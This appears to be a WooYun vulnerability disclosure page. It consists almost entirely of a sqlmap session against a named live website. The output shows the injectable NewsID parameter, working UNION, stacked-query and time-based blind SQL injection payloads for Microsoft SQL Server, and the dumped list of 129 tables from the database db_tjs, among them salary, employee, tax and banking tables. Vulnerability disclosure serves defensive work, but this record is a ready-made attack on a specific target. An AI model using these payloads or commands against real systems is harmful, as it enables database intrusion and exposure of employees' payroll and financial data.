WooYun.org

[root@Hacker~]# Sqlmap  Sqlmap -u "http://lntjs.vicp.net/fgfw-detail.asp?NewsID=1" -D db_tjs --tables --thread 10
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey a
[*] starting at 17:28:48
[17:28:49] [INFO] resuming back-end DBMS 'microsoft sql server'
[17:28:49] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: NewsID
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: NewsID=1' UNION ALL SELECT CHAR(113)+CHAR(119)+CHAR(119)+CHAR(116)+CHAR(113)+CHAR(98)+CHAR(106)+CHAR(73)+CHAR(83)+CHAR(107)+CHAR(102)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: NewsID=1'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: NewsID=1' WAITFOR DELAY '0:0:5'--
---
[17:28:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[17:28:49] [INFO] fetching tables for database: db_tjs
Database: db_tjs
[129 tables]
+----------------------------+
| ArriveCompanyDetailTable   |
| ArriveCompanyMainTable     |
| ArriveCompanyRecordTable   |
| CityDetailTable            |
| CityMainTable              |
| ClientInfo                 |
| DETAIL                     |
| ErrCheckTable              |
| MachinePerSonTable         |
| ProductMapping             |
| Products                   |
| QueryCarrierShipment       |
| T1_gz_gzjs                 |
| T1_gz_sdsbz                |
| T_Area                     |
| T_CLInfo                   |
| T_Department               |
| T_Employee                 |
| T_FArea                    |
| T_IdName                   |
| T_Operator                 |
| T_Position                 |
| T_PrivilegeList            |
| T_PrivilegeMapping         |
| T_Role                     |
| T_RowCount                 |
| T_SalaryDetail             |
| T_SalaryInfo               |
| T_SalarySheet              |
| T_cljcxx                   |
| T_cw_km_hz                 |
| T_cw_km_ye                 |
| T_cw_km_ye_mx              |
| T_cw_km_ye_ny              |
| T_cw_pz_hz                 |
| T_cw_pz_input              |
| T_cw_pz_mx                 |
| T_cw_pzh                   |
| T_ddd                      |
| T_fct                      |
| T_fgfw                     |
| T_fgs                      |
| T_gz_bx                    |
| T_gz_mbyye                 |
| T_gz_mbyyefw               |
| T_gz_sds                   |
| T_gz_ssxxcx                |
| T_gz_tcblhbx               |
| T_gz_twcyye                |
| T_gz_wwcyyehgz             |
| T_gz_yfhjhbxl              |
| T_gz_yggzmx                |
| T_gz_yggzmx1               |
| T_gz_yggzmx2               |
| T_gz_ygjbxx                |
| T_gz_yjzycl                |
| T_gzd_qdtmp                |
| T_killinfo                 |
| T_logs                     |
| T_operators                |
| T_rk_temp                  |
| T_rk_wld                   |
| T_rk_wld_hz                |
| T_rk_wld_mxhz              |
| T_rk_wld_mxhz1             |
| T_sz_dsfbz                 |
| T_sz_qtje                  |
| T_sz_rbhz                  |
| T_sz_yhk                   |
| T_sz_yhksrmx               |
| T_tax                      |
| T_test                     |
| T_tz                       |
| T_version                  |
| T_wtr                      |
| T_wts                      |
| T_yfjs_bz                  |
| T_ygxx                     |
| T_yh_cjc                   |
| T_yh_jyls                  |
| T_yh_kcz                   |
| T_yh_kjc                   |
| T_yh_yc                    |
| Table_czy                  |
| Table_fgsjl                |
| Table_fxj                  |
| Table_jbsj                 |
| Table_jxgz                 |
| Table_mbyye                |
| Table_sl                   |
| Table_tcbz                 |
| Table_tf                   |
| Table_yggzb                |
| Table_yhje                 |
| Table_yysj                 |
| UploadRoute                |
| UploadTransportInformation |
| V_OP                       |
[17:28:50] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled
| ??                         |
| dealer                     |
| dtproperties               |
| fhfs                       |
| info_op                    |
| op_history                 |
| pbcatcol                   |
| pbcatedt                   |
| pbcatfmt                   |
| pbcattbl                   |
| pbcatvld                   |
| rktemp                     |
| sysconstraints             |
| syssegments                |
| t2                         |
| t_cn_bj                    |
| t_cn_ds                    |
| t_cn_fp                    |
| t_cn_hz                    |
| t_cn_rb                    |
| t_cn_sz                    |
| t_cn_xh                    |
| t_cn_yh                    |
| t_cn_yhrb                  |
| t_cn_yj                    |
| t_cn_yyt                   |
| t_yhhzb                    |
| t_yhlsz                    |
| t_yyhb                     |
| tb_print                   |
| worksheet                  |
+----------------------------+